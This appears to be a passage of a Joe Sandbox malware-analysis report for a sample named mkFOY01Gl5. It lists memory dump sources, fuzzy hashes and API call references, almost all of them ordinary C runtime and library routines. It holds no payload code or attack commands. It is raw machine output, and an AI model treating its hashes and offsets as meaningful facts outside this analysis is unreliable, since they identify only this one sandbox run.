        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled
        • String ID:
        • API String ID: 3192549508-0
        • Opcode ID: b0de901b33566082f9b44db74807f38a5dc7e516364e0f2b95817ecfe509f86f
        • Instruction ID: e0e16f75adc760a02ad5d74ddeb48d86b59c78b044628e01a2a08ad3fcb7f57c
        • Opcode Fuzzy Hash: b0de901b33566082f9b44db74807f38a5dc7e516364e0f2b95817ecfe509f86f
        • Instruction Fuzzy Hash:
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: HeapProcess
        • String ID:
        • API String ID: 54951025-0
        • Opcode ID: c967c3291b164d5e17a932d95da737f97633090c6f06166ff89a5cf014e3aa70
        • Instruction ID: b299b030ab19fd877f93d1650d2bf29ef39aa1d8af5f109de6900fde39c0cd97
        • Opcode Fuzzy Hash: c967c3291b164d5e17a932d95da737f97633090c6f06166ff89a5cf014e3aa70
        • Instruction Fuzzy Hash: F7A01130202200CB83028F30AB0820A3AAABB882C030880A8A008C8AA0EA3080C0AA00
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a053df47e1f7a8b2c53f1fac2e431e5c3a136374f9f2535a01469136b2c20db2
        • Instruction ID: c32a2049de485bad157fa29d2ff860fdddd069901e40a545a514defbb4e20f53
        • Opcode Fuzzy Hash: a053df47e1f7a8b2c53f1fac2e431e5c3a136374f9f2535a01469136b2c20db2
        • Instruction Fuzzy Hash: 4CD1AE329087449FC314DF28C84196FFBE5BFC8750F044A2DFA99A7651E730EA449B92
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
        • Instruction ID: 17e289a118421a489eca110e579cbfe90e690adc347acf345b9b9dd363867856
        • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
        • Instruction Fuzzy Hash: 72E08CB2A11228EBCB18DB8CC904D8AF3ECEB48B40B254096B501D3140C7B0DF10C7D0
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
        • Instruction ID: d9dda17d0da3508dfa134239d5ffd0d66d93b0cde75760cf4ca381797a2a9d41
        • Opcode Fuzzy Hash: d4d8b999291919f67ab95172bb40c1622bcef9bcb7b93c8f6f6cac1d49c48351
        • Instruction Fuzzy Hash: DAC08C3460190096CE2989108275BA833A4B3A1B82F80048CD8824B6C2C7DE9C8AD640
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1EF5
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1F0F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F1F30
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F1F88
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F1FCD
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F201E
        • __Getctype.LIBCPMT ref: 000F2035
        • std::_Facet_Register.LIBCPMT ref: 000F205F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2078
          • Part of subcall function 000F50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F50B6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
        • String ID: bad locale name
        • API String ID: 2137871723-1405518554
        • Opcode ID: df8a8c2af9dcf0876ad8cbdccc33e35db10b7a92b745752173f3ac70c38815a1
        • Instruction ID: 39e2b304a6de22bbd6be54799d150855d07b6619a48a32a687985f3a4fd4d67d
        • Opcode Fuzzy Hash: df8a8c2af9dcf0876ad8cbdccc33e35db10b7a92b745752173f3ac70c38815a1
        • Instruction Fuzzy Hash: F541D232504348CFC360DF18D880BBAB7E0AF95710F15456DFA849BA52DB71E98ADB92
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F20B2
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F20CF
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F20F0
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F214B
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F218C
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F21CF
        • std::_Facet_Register.LIBCPMT ref: 000F21F8
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2211
          • Part of subcall function 000F50AA: std::invalid_argument::invalid_argument.LIBCONCRT ref: 000F50B6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
        • String ID: bad locale name
        • API String ID: 3096327801-1405518554
        • Opcode ID: fbbbd93b22332084425e9eebdc82b2a7b86bc1e5519c8cc6f8d41547d8ad2bb3
        • Instruction ID: 5d549bdbb9fa9a43c254bdb537810d18db877049033289357052a7bc3b0d9594
        • Opcode Fuzzy Hash: fbbbd93b22332084425e9eebdc82b2a7b86bc1e5519c8cc6f8d41547d8ad2bb3
        • Instruction Fuzzy Hash: 9641E4729043488FC360DF24D8809ABB7E0BF94710F05456DEB859B652DB30ED4ADB93
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F3011
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F3058
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F311A
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F311F
        • Concurrency::cancel_current_task.LIBCPMT ref: 000F3124
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
        • String ID: bad locale name$false$true
        • API String ID: 164343898-1062449267
        • Opcode ID: de1cdceaf1d3adaa6ce46866bdb5b076bba300b541f89b11b22f6700d8151cad
        • Instruction ID: 0f97c90ca6fc149848d156eebad7df5196e7e7bea4833e07db14d29b17beba8a
        • Opcode Fuzzy Hash: de1cdceaf1d3adaa6ce46866bdb5b076bba300b541f89b11b22f6700d8151cad
        • Instruction Fuzzy Hash: FC41F3715047489FC324DF2488817ABBBE0BF84710F44492EF7989BA53EB70DA49DB92
        APIs
        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000F7158
        • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 000F7166
        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 000F7177
        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 000F7188
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
        • API String ID: 667068680-1247241052
        • Opcode ID: 820dba2e5e30547551ffb61c860a53572bba07222c393cf08a1e3d3397b9a475
        • Instruction ID: 903a8f9013c098b5d0bd95e58552b8083de8f658fd4f897a81b6dc3ef63e2555
        • Opcode Fuzzy Hash: 820dba2e5e30547551ffb61c860a53572bba07222c393cf08a1e3d3397b9a475
        • Instruction Fuzzy Hash: 5FE0EC31A51720EBC309AFF0BD1D9DA3ABABB4E7413848426F405D2960DB7684C0CBE0
        APIs
        • type_info::operator==.LIBVCRUNTIME ref: 000FAA37
        • ___TypeMatch.LIBVCRUNTIME ref: 000FAB45
        • _UnwindNestedFrames.LIBCMT ref: 000FAC97
        • CallUnexpected.LIBVCRUNTIME ref: 000FACB2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
        • String ID: csm$csm$csm
        • API String ID: 2751267872-393685449
        • Opcode ID: bf7dd03c1e88dc134e0d2fe369dd922398ad6611efed803e9d8a354067b32abd
        • Instruction ID: 7736ad3eea8c431108f03eb362fa0c4b4f6ccd465d64369ac8cf03db9ead8f80
        • Opcode Fuzzy Hash: bf7dd03c1e88dc134e0d2fe369dd922398ad6611efed803e9d8a354067b32abd
        • Instruction Fuzzy Hash: DDB16BB1A0020DDFCF19DF94C9819BEB7B5FF0A310B144159EA096BA12D731EA51EF92
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID: 0-3907804496
        • Opcode ID: 4f7af0308dec2e945f6ab25d1ce9185cd3484aff365a3f99953acbd528bfcd3b
        • Instruction ID: 9d64076e6313ec84943ace115e7bd256239aa53b984c01eaf67e576cfa782d61
        • Opcode Fuzzy Hash: 4f7af0308dec2e945f6ab25d1ce9185cd3484aff365a3f99953acbd528bfcd3b
        • Instruction Fuzzy Hash: AAB1C570E0424AEFDB15DF99C8A0BBE7BB1AF99300F144155E5859B2D3C7B09D82CBA1
        APIs
        • GetCPInfo.KERNEL32(007654A0,007654A0,?,7FFFFFFF,?,001127D4,007654A0,007654A0,?,007654A0,?,?,?,?,007654A0,?), ref: 001125AA
        • __alloca_probe_16.LIBCMT ref: 00112665
        • __alloca_probe_16.LIBCMT ref: 001126F4
        • __freea.LIBCMT ref: 0011273F
        • __freea.LIBCMT ref: 00112745
        • __freea.LIBCMT ref: 0011277B
        • __freea.LIBCMT ref: 00112781
        • __freea.LIBCMT ref: 00112791
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __freea$__alloca_probe_16$Info
        • String ID:
        • API String ID: 127012223-0
        • Opcode ID: b66c7ab4c8f7fde0a8c042af85befed9fb5e63a7720f108db884cf51f2c03ba8
        • Instruction ID: 37adc720260115c6e41efe65aafd8504a513bd4bcb9a668b3170c03fb9dbebea
        • Opcode Fuzzy Hash: b66c7ab4c8f7fde0a8c042af85befed9fb5e63a7720f108db884cf51f2c03ba8
        • Instruction Fuzzy Hash: 4571D672A042096BDF299F548C81BFF77AAAF59310F250139E904A72D2EB75DCA0C760
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 000F6E71
        • __alloca_probe_16.LIBCMT ref: 000F6E9D
        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 000F6EDC
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000F6EF9
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000F6F38
        • __alloca_probe_16.LIBCMT ref: 000F6F55
        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000F6F97
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000F6FBA
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ByteCharMultiStringWide$__alloca_probe_16
        • String ID:
        • API String ID: 2040435927-0
        • Opcode ID: e4c8d1804b867ab2a800d3458e0353cefb8f76b9f042fe88565c7573b015881b
        • Instruction ID: 5ef3842f35ceaa7518c010b3183cca3bd101b297d6472c30721e36b0b0c0477c
        • Opcode Fuzzy Hash: e4c8d1804b867ab2a800d3458e0353cefb8f76b9f042fe88565c7573b015881b
        • Instruction Fuzzy Hash: E251BF7290021EABDF209FA4DC44FBB7BBAEF44740F154424FA15D6590E7729D18EBA0
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F223D
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F225B
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F227C
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F22CC
        • std::_Facet_Register.LIBCPMT ref: 000F22F6
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F230F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::~_$Lockit::_$Facet_Register
        • String ID:
        • API String ID: 1858714459-0
        • Opcode ID: 1dd2cd6482709a833dd77ea445a79850265106a5f42dad28233452ca8e0c1853
        • Instruction ID: 11f8286cd7db832e8de7b627715fc000d9737b1531eba6814a53fd09fe376f05
        • Opcode Fuzzy Hash: 1dd2cd6482709a833dd77ea445a79850265106a5f42dad28233452ca8e0c1853
        • Instruction Fuzzy Hash: 9321467690421D9FC750DF14FC809BAB3A0FB80320F04066DEE4197A52DB34AE4AEBD2
        APIs
        • GetLastError.KERNEL32(?,?,000FA5A1,000F8CDA,000F7E75), ref: 000FA5B8
        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 000FA5C6
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000FA5DF
        • SetLastError.KERNEL32(00000000,000FA5A1,000F8CDA,000F7E75), ref: 000FA631
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLastValue___vcrt_
        • String ID:
        • API String ID: 3852720340-0
        • Opcode ID: 02496e958d624924cee234925731c0d7108c11c57b1ecd697b746d14eda55477
        • Instruction ID: 439cbad434f4d288f92bc52e646a9965c93c35c9e90c1fa63a6cc61b8b51a896
        • Opcode Fuzzy Hash: 02496e958d624924cee234925731c0d7108c11c57b1ecd697b746d14eda55477
        • Instruction Fuzzy Hash: A101F572218B196E9AA427F4AC855BA36C4DB527B5720032AF31481DE2FF924C427545
        APIs
        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,429EDEEC,?,?,00000000,00113CC0,000000FF,?,00101F76,?,?,00101F4A,00000016), ref: 0010201B
        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0010202D
        • FreeLibrary.KERNEL32(00000000,?,00000000,00113CC0,000000FF,?,00101F76,?,?,00101F4A,00000016), ref: 0010204F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: cd0252d4eca5b29e348065ded1101c79acbaad60cea02cbf120fa04663f5f353
        • Instruction ID: d042cb0ebb45781d6ea1395f7bcb15f346a5afac9224468a57e1442f6b03fb32
        • Opcode Fuzzy Hash: cd0252d4eca5b29e348065ded1101c79acbaad60cea02cbf120fa04663f5f353
        • Instruction Fuzzy Hash: 4901DB31900715EFCB158F90CD09BEE7BBEFB48750F008525F811A26D0DBB49940CB90
        APIs
        • __alloca_probe_16.LIBCMT ref: 00107B8A
        • __alloca_probe_16.LIBCMT ref: 00107C4B
        • __freea.LIBCMT ref: 00107CB2
          • Part of subcall function 00105136: HeapAlloc.KERNEL32(00000000,00000001,?,?,000F7FC8,?,?,?,?,?,000F27FE,00000001,?), ref: 00105168
        • __freea.LIBCMT ref: 00107CC7
        • __freea.LIBCMT ref: 00107CD7
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: __freea$__alloca_probe_16$AllocHeap
        • String ID:
        • API String ID: 1096550386-0
        • Opcode ID: b41c7ca242e359de933bb8f400620fded6b26b00b3e748210a8d55cb04d677e1
        • Instruction ID: 7215645e76d31f6a838366a5fdd59dcdaff0c08f8493f90e9566cffed5021df1
        • Opcode Fuzzy Hash: b41c7ca242e359de933bb8f400620fded6b26b00b3e748210a8d55cb04d677e1
        • Instruction Fuzzy Hash: 8B51A372A0820BAFEB249F648E81EBB77A9EF04350B150528FD44D62D1E7B1EC50D7A0
        APIs
        • __EH_prolog3.LIBCMT ref: 000F59C4
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F59CE
          • Part of subcall function 000F2CF0: std::_Lockit::_Lockit.LIBCPMT ref: 000F2CFF
          • Part of subcall function 000F2CF0: std::_Lockit::~_Lockit.LIBCPMT ref: 000F2D1A
        • codecvt.LIBCPMT ref: 000F5A08
        • std::_Facet_Register.LIBCPMT ref: 000F5A1F
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F5A3F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
        • String ID:
        • API String ID: 712880209-0
        • Opcode ID: db5a96a1b464d76f0fb5ca364bca3f128b1be9312e6fdfbee9e6cb760f703777
        • Instruction ID: e1c44116f7f2dc65e32c48640a98ebb256004537bc6ef2561a8ac35fb0f5a882
        • Opcode Fuzzy Hash: db5a96a1b464d76f0fb5ca364bca3f128b1be9312e6fdfbee9e6cb760f703777
        • Instruction Fuzzy Hash: DF11E131904628DFCB15EB68CD416FEB7F4AF44321F140519FA05A7A83DBB0AE40AB91
        APIs
        • __EH_prolog3.LIBCMT ref: 000F5481
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F548C
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F54FA
          • Part of subcall function 000F55DD: std::locale::_Locimp::_Locimp.LIBCPMT ref: 000F55F5
        • std::locale::_Setgloballocale.LIBCPMT ref: 000F54A7
        • _Yarn.LIBCPMT ref: 000F54BD
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
        • String ID:
        • API String ID: 1088826258-0
        • Opcode ID: 0a863dd02cf13cd6ce6e78eba6ca87bf70f2c7a7a0551914295759797d53bfb8
        • Instruction ID: 1bebb5c8c59904c15501b6620b5c0d5f0b4689f659f1929d60e22454b0fff396
        • Opcode Fuzzy Hash: 0a863dd02cf13cd6ce6e78eba6ca87bf70f2c7a7a0551914295759797d53bfb8
        • Instruction Fuzzy Hash: 5B01D4756049189BC70AEF20DD515BD3BB2FF85341B144058EA1557B82CFB46E82DB85
        APIs
        • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,000FB6A3,00000000,00000001,0017057C,?,?,?,000FB846,00000004,InitializeCriticalSectionEx,00116EA0,InitializeCriticalSectionEx), ref: 000FB6FF
        • GetLastError.KERNEL32(?,000FB6A3,00000000,00000001,0017057C,?,?,?,000FB846,00000004,InitializeCriticalSectionEx,00116EA0,InitializeCriticalSectionEx,00000000,?,000FB5FD), ref: 000FB709
        • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,000FA513), ref: 000FB731
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
